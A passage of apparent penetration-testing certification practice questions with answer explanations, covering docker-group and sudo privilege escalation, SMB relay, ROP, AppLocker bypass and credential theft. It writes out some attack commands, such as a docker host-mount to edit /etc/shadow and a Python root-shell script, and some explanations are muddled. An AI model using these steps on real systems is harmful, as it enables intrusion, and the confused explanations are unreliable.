CompTIA often tests the misconception that privilege escalation (root) or custom class loading is required, when in fact the core requirement is the availability of gadget chains in the classpath.

How to eliminate wrong answers

Option A is wrong because the exploit does not require root privileges; it relies on the application's own permissions and the presence of gadget chains, not on the operating system user. Option B is wrong because a custom ClassLoader is not a prerequisite for Java deserialization attacks; the exploit works with the default class loading mechanism as long as the necessary gadget classes are in the classpath.

65
MCQmedium

During a penetration test, a tester gains shell access on a Linux server as a low-privileged user. The user is identified as a member of the 'docker' group. Which technique is most effective for escalating privileges to root?

A.Use docker to mount the entire host filesystem and modify the root password.
B.Use docker to run a container with network host mode to access internal services.
C.Use docker to pull a malicious image from the internet to compromise other containers.
D.Use docker to create a new user with root privileges inside a container.
AnswerA

Running 'docker run -v /:/mnt -it ubuntu bash' mounts the host root filesystem. From inside the container, the attacker can chroot to /mnt and modify /etc/shadow or add an SSH authorized key, gaining full root access.

Why this answer

Membership in the 'docker' group grants the user effective root-equivalent access because the Docker daemon runs as root and allows any member of the 'docker' group to issue commands that can mount arbitrary host paths. By running a container with the host filesystem mounted (e.g., `docker run -v /:/mnt --privileged -it alpine chroot /mnt`), the tester can directly modify the `/etc/shadow` file or the root password, thereby escalating privileges to root without needing any additional exploit.

Exam trap

The trap here is that candidates may think Docker group membership only allows container management or network manipulation, overlooking the fact that the Docker socket grants full root-equivalent file system access via volume mounts.

How to eliminate wrong answers

Option B is wrong because using network host mode (`--network host`) only gives the container access to the host's network stack, which might help with lateral movement or service discovery but does not provide a mechanism to escalate privileges to root on the host itself. Option C is wrong because pulling a malicious image from the internet could compromise other containers or the host if the image exploits a vulnerability, but it is not a reliable or direct method for privilege escalation; the most effective and immediate technique is to mount the host filesystem and modify authentication files.

66
MCQmedium

A penetration tester has gained a foothold on a Windows server running IIS. The tester wants to perform an SMB relay attack to move laterally within the domain. Which of the following conditions must be met for this attack to succeed?

A.The target server must have SMB signing disabled or not enforced
B.The tester must have local administrator privileges on the IIS server
C.The target server must be running SMBv1
D.The tester must have a valid domain user account to trigger the relay
AnswerA

SMB signing prevents relay attacks because the relayed authentication would lack the required signature, causing the target to reject the connection. Without signing enforced, the relay is possible.

Why this answer

SMB relay attacks work by intercepting an SMB authentication attempt and forwarding it to a target server. For the relay to succeed, the target server must not require SMB signing, or signing must be disabled, because signing cryptographically binds the authentication to the original session, preventing the relayed credentials from being reused. If SMB signing is enforced, the target server will reject the relayed authentication, as the signature will not match the new session.

Exam trap

The trap here is that candidates often assume SMB relay requires SMBv1 or local admin privileges, but the critical condition is the absence of SMB signing enforcement, which is a common misconfiguration in enterprise environments.

How to eliminate wrong answers

Option B is wrong because local administrator privileges on the IIS server are not required for an SMB relay attack; the attacker only needs to be able to capture or trigger an SMB authentication attempt (e.g., via a rogue SMB server or by tricking a user) and relay it to the target. Option C is wrong because SMB relay attacks do not require SMBv1; they can work over SMBv2 or SMBv3 if signing is not enforced, though SMBv1 is often targeted due to its weaker security defaults.

67
MCQhard

A penetration tester gains a foothold on a Linux system with ASLR and NX enabled. The tester identifies a stack buffer overflow in a SUID binary. The binary has no PIE (Position Independent Executable) and is compiled without stack canaries. The tester wants to execute a shell. Which technique should be used?

A.Return-to-libc attack
B.Heap spraying
C.ROP chain
D.Buffer overflow with NOP sled
AnswerC

ROP chains use gadgets from the non-randomized binary (since it lacks PIE) to execute arbitrary code, bypassing both ASLR and NX.

Why this answer

Since the binary has no PIE and lacks stack canaries, the attacker can overwrite the saved return address and can rely on the binary's own code addresses, which are not randomized. However, with ASLR and NX enabled, the stack is non-executable and system library addresses are randomized. A ROP chain allows the tester to bypass both protections by chaining small instruction sequences (gadgets) already present in the binary or loaded libraries to achieve arbitrary code execution, such as calling execve to spawn a shell.

Exam trap

CompTIA often tests the misconception that return-to-libc alone bypasses ASLR, but without a leak, the randomized libc base makes the attack fail; the trap here is that candidates may overlook the need for an information leak or assume that a non-PIE binary eliminates ASLR entirely.

How to eliminate wrong answers

Option A is wrong because a return-to-libc attack relies on knowing the address of a libc function like system(), but ASLR randomizes the base address of libc, making the address unpredictable without an information leak. Option B is wrong because heap spraying is used to exploit heap-based vulnerabilities or to bypass ASLR by filling the heap with shellcode, but here the vulnerability is a stack buffer overflow and NX prevents execution of shellcode placed on the stack or heap.

68
Multi-Selectmedium

Which TWO of the following are effective methods for bypassing AppLocker during a penetration test? (Choose two.)

A.Execute code via WMIC
B.Use InstallUtil.exe to run a malicious .exe
C.Run regsvr32.exe to execute a .dll
D.Use PowerShell with Bypass execution policy
E.Launch a script with cscript.exe
AnswersB, C

InstallUtil is a trusted binary that can be used to execute code.

Why this answer

Option C is correct because regsvr32 can be used to execute code via DLL registration. Option B is correct because InstallUtil is a trusted Microsoft executable that can run arbitrary code.

How to eliminate wrong answers

Option D is wrong because PowerShell execution policy is separate from AppLocker. Option A is wrong because WMIC is not typically allowed by AppLocker. Option E is wrong because cscript is often blocked, but using trusted binaries is the key.

69
MCQhard

A penetration tester is targeting a web application that uses parameterized queries for all database interactions. Which attack vector is most likely to succeed?

A.Cross-site request forgery
B.SQL injection
C.Cross-site scripting
D.Business logic flaws
AnswerD

Parameterized queries do not protect against logic flaws such as manipulating pricing or access controls.

Why this answer

Parameterized queries prevent SQL injection by separating SQL code from user input, making option B ineffective. Business logic flaws (D) are vulnerabilities in the application's design or workflow that are not mitigated by secure coding practices like parameterized queries, so they remain exploitable. This attack vector targets the intended functionality of the application, such as manipulating pricing or bypassing authentication steps, which parameterized queries do not protect against.

Exam trap

The trap here is that candidates assume parameterized queries eliminate all database-related attacks, overlooking that business logic flaws are independent of query construction and remain a viable attack vector.

How to eliminate wrong answers

Option A is wrong because cross-site request forgery exploits the trust a site has in a user's browser, not database query construction, and parameterized queries have no impact on CSRF defenses. Option B is wrong because parameterized queries are specifically designed to prevent SQL injection by ensuring user input is treated as data, not executable code, so this attack vector will fail. Option C is wrong because cross-site scripting exploits client-side script injection in web pages, not database interactions, and parameterized queries do not affect XSS vulnerabilities.

70
MCQhard

During a penetration test, a tester finds a custom binary that is vulnerable to a stack-based buffer overflow. The binary has DEP enabled but no ASLR. Which of the following exploitation techniques would be MOST effective to achieve code execution?

A.Return-oriented programming (ROP) to bypass DEP
B.Heap spraying to inject shellcode
C.ret2libc to call system() with a controlled argument
D.Stack pivoting to redirect execution to a known location
AnswerC

ret2libc leverages existing libc functions (like system) at fixed addresses (since no ASLR) to execute commands, bypassing DEP.

Why this answer

Option C is correct because ret2libc allows the tester to call the system() function from libc with a controlled argument (e.g., "/bin/sh") to spawn a shell, bypassing DEP (which prevents code execution on the stack) without needing to execute shellcode. Since ASLR is disabled, the address of system() and the string "/bin/sh" in libc are predictable, making this technique reliable and effective.

Exam trap

The trap here is that candidates may choose ROP (Option A) thinking it is always required to bypass DEP, but ret2libc is a simpler and more effective technique when ASLR is disabled, as it directly calls a libc function without needing to chain gadgets.

How to eliminate wrong answers

Option A is wrong because Return-oriented programming (ROP) is also a valid technique to bypass DEP, but it is more complex and unnecessary when ASLR is disabled; ret2libc is simpler and more direct for achieving code execution. Option B is wrong because heap spraying is used to bypass ASLR by filling the heap with NOP sleds and shellcode, but ASLR is already disabled, and DEP prevents execution of shellcode on the heap, making this ineffective. Option D is wrong because stack pivoting is a technique to redirect execution to a controlled memory region (e.g., the heap) when the stack is not directly controllable, but here the vulnerability is a stack-based buffer overflow where the stack is directly controllable, and DEP is bypassed via ret2libc, not by pivoting.

71
MCQhard

During a red team engagement, a penetration tester needs to pivot from a compromised internal web server to a database server that is not directly accessible. The web server has two network interfaces: 10.0.1.5 and 192.168.1.5. The database server is at 192.168.1.10. Which technique should the tester use to reach the database?

A.ARP spoofing
B.DNS tunneling
C.Port knocking
D.Pivoting through the web server
AnswerD

The web server can route traffic to the database subnet, allowing the tester to attack the database.

Why this answer

D is correct because the web server has two network interfaces (10.0.1.5 and 192.168.1.5), making it a dual-homed host that can act as a pivot point. The tester can use the compromised web server as a proxy or relay to route traffic from the attacker's machine (reachable via 10.0.1.5) to the database server at 192.168.1.10, which is on a separate subnet not directly accessible. This technique, known as pivoting, typically involves tools like SSH port forwarding, Metasploit's route add, or a SOCKS proxy to forward traffic through the compromised host.

Exam trap

The trap here is that candidates confuse pivoting with other network manipulation techniques like ARP spoofing or port knocking, failing to recognize that the dual-homed web server provides a routing path between subnets, which is the core requirement for pivoting.

How to eliminate wrong answers

Option A is wrong because ARP spoofing operates at Layer 2 within the same broadcast domain to intercept traffic between hosts, but it cannot bridge traffic across different subnets (10.0.1.0/24 and 192.168.1.0/24) or provide access to a host that is not directly reachable from the attacker. Option B is wrong because DNS tunneling encapsulates non-DNS traffic within DNS queries and responses, which is used for exfiltration or command-and-control, not for routing traffic through a dual-homed host to reach an internal database server. Option C is wrong because port knocking is an authentication method that opens a firewall port after a sequence of connection attempts, but it does not enable routing or forwarding of traffic from one subnet to another through a compromised host.

72
MCQhard

A penetration tester has gained low-privilege shell access on a Linux server. The tester runs `sudo -l` and sees the following entry: `(root) NOPASSWD: /usr/bin/python3 /opt/scripts/*.py`. The `/opt/scripts/` directory is owned by the tester's current user. Which technique is most effective for escalating privileges to root?

A.Create a symbolic link from a Python script to a system file like /etc/shadow
B.Write a malicious Python script to /opt/scripts/ that spawns a root shell
C.Exploit a kernel vulnerability to overwrite the sudo binary
D.Overwrite an existing Python script in /usr/bin/ with a malicious payload
AnswerB

Since the user owns the directory, they can write a Python script that executes `/bin/bash` or similar, then run it via sudo to gain a root shell.

Why this answer

Option B is correct because the tester's user owns `/opt/scripts/` and can write arbitrary files there. The sudo rule allows executing any `.py` file in that directory as root without a password. By writing a Python script that calls `os.setuid(0); os.system('/bin/bash')` or similar, the tester can spawn a root shell, directly leveraging the misconfigured sudoers entry.

Exam trap

The trap here is that candidates may think symbolic links or overwriting system files are viable, but the key is that the sudo rule specifically executes Python scripts from a writable directory, making a crafted script the simplest and most direct escalation path.

How to eliminate wrong answers

Option A is wrong because creating a symbolic link from a Python script to `/etc/shadow` would not execute as root; `sudo` runs the Python interpreter on the linked file, but `/etc/shadow` is not a valid Python script and would cause an error, not privilege escalation. Option C is wrong because exploiting a kernel vulnerability is unnecessary and less reliable; the sudo misconfiguration provides a direct, low-risk path to root without kernel exploits. Option D is wrong because the sudo rule only applies to `/opt/scripts/*.py`, not to `/usr/bin/`; overwriting a script there would not be executed with root privileges via this sudo entry.

73
MCQmedium

Refer to the exhibit. After running a port scan in Metasploit, what is the next best step to identify vulnerabilities on the open ports?

A.Perform a brute-force attack against SSH and HTTP
B.Immediately exploit the open HTTP service
C.Run a Nessus scan on the host
D.Use the scanner to run service version detection on those ports
AnswerD

Knowing the exact version of services allows matching against known vulnerabilities.

Why this answer

After a port scan in Metasploit, the next best step is to run service version detection (e.g., using the `scanner/portscan/tcp` auxiliary module's `VERSION` option or the `db_nmap -sV` command) to identify the exact software and version running on each open port. This version information is critical for matching against known vulnerabilities in databases like CVE or Exploit-DB, enabling targeted exploitation. Option D is correct because it follows the systematic penetration testing methodology of enumeration before exploitation.

Exam trap

The trap here is that candidates often jump to exploitation (Option B) or brute-forcing (Option A) without performing version detection, missing the critical enumeration step that identifies the exact service version needed to select the correct exploit.

How to eliminate wrong answers

Option A is wrong because performing a brute-force attack against SSH and HTTP without first identifying service versions is premature and inefficient; it wastes time on guessing credentials when the services might have known unpatched vulnerabilities that are easier to exploit. Option B is wrong because immediately exploiting the open HTTP service without version detection risks using an incorrect or incompatible exploit, which could crash the service or alert defenders, and violates the principle of thorough enumeration. Option C is wrong because running a Nessus scan on the host is a valid next step, but the question specifically asks for the next best step after a Metasploit port scan, and Metasploit's built-in service version detection (e.g., `db_nmap -sV` or auxiliary scanner modules) is more direct and integrated into the Metasploit workflow, whereas Nessus is an external tool that requires separate setup and may not be available in all exam scenarios.

74
MCQhard

A penetration tester is targeting a Windows domain controller. After compromising a standard user account, the tester wants to escalate to domain admin. Which attack is most effective if the tester can capture plaintext passwords from memory?

A.Create a golden ticket
B.Create a silver ticket
C.Pass-the-hash attack
D.DCSync attack
AnswerC

With a captured NTLM hash, the tester can authenticate to other services as that user, potentially gaining domain admin if the user has privileges.

Why this answer

Option C is correct because capturing plaintext passwords from memory (e.g., via Mimikatz sekurlsa::logonpasswords) allows the tester to directly use the domain admin's plaintext credentials in a pass-the-hash attack. This attack reuses the NTLM hash (or plaintext) to authenticate to other systems without needing to crack or forge tickets, making it the most direct escalation path from a standard user to domain admin when plaintext passwords are available.

Exam trap

The trap here is that candidates often confuse pass-the-hash with Kerberos-based attacks (golden/silver tickets) or DCSync, but the key differentiator is that plaintext passwords in memory enable direct NTLM authentication, not ticket forgery or replication attacks.

How to eliminate wrong answers

Option A is wrong because a golden ticket requires forging a Kerberos TGT using the KRBTGT account's hash, which is not obtained from plaintext passwords in memory of a standard user; it requires domain admin privileges or a DCSync attack. Option B is wrong because a silver ticket forges a service ticket (TGS) using the service account's NTLM hash, which does not grant domain admin privileges and is limited to a specific service. Option D is wrong because a DCSync attack requires domain admin or equivalent privileges to replicate directory data; it cannot be executed from a standard user account, even with plaintext passwords.

75
MCQeasy

A penetration tester has discovered a vulnerable service running on a Linux server that allows remote code execution. Which of the following is the most appropriate next step to maintain access?

A.Clear all system logs to avoid detection
B.Immediately report the finding to the client
C.Install a backdoor for persistent access
D.Escalate privileges to root
AnswerC

A backdoor ensures the tester can re-enter the system if needed.

Why this answer

Option C is correct because after gaining initial access, installing a backdoor ensures persistent access. Option A is wrong because erasing logs prematurely could alert defenders. Option D is wrong because privilege escalation may not be necessary if current access is sufficient. Option B is wrong because reporting should occur after the engagement, not during.
